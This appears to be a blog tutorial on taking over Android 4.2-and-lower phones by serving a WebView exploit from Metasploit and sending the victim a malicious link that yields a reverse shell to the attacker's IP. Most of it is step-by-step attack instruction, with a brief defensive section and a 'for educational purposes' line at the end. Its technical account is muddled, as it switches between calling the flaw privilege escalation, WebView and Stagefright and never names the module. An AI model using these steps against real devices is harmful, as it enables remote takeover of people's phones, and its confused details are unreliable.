This hack exploits a privilege escalation issue in Android version 4.2 and lowers having
A hacker can now send the victim a malicious link, and if the victim is vulnerable, the device will get a reverse shell back to the attacker. This is basically how hackers hack android phones.
So without any further ado lets start hacking with webview exploit.
Step 1: Start your Kali Linux machine.
Start your Kali Linux machine and open Metasploit console.
Step 2: Set Metasploit server for using the webview exploit
To set up Metasploit type the following commands in msf console:
set SRVHOST 192.168.182.136 (your IP here)
set URIPATH /
set lhost 192.168.182.136 (your IP here)
Step 3: Exploit the victim having stagefright vulnerability
Now that the webview exploit is running. Send the malicious link to the victim to hack an android device with a link.
In my case, the link is: http://192.168.182.136:8080/
Note: This attack works only on limited android devices with vulnerable webview API.
Step 4: Enjoy the hack.
Once the victim clicks on the malicious link, their android device will be hacked. And you can control it remotely with the webview exploit. This is how easy it is to hack an android device with a link.
How do I protect myself from hackers using this hack?
Check if your device is vulnerable. Use the Norton exploit security app to check if your device is vulnerable to exploits.
— UPDATE YOUR DEVICE: This bug has been long fixed make sure you update your android device so that you are not vulnerable to the webview vulnerability. Also, update your browser.
— CHANGE YOUR ANDROID DEVICE: Buy a new device with the latest updates. Buy an android one device
— OFFICIAL PLAYSTORE: Only install apps from the official play store. Do not open unknown links and files which you do not trust.
Commonly asked questions about hacking android devices with stagefright exploit:
Q1) Does it work on all phones?
No, only phones with an android version jellybean and below.
Q2) It’s not working on my kali machine?
Update Kali Linux and try again. Try repeating all the steps. If you get a specific error, then mention it in the comment section.
Q3) I want to hack my girlfriend’s phone with webview exploit. Tell me how?
This type of request is not accepted. Kindly use this article only for educational purposes. Do not misuse the knowledge of hacking with webview exploit.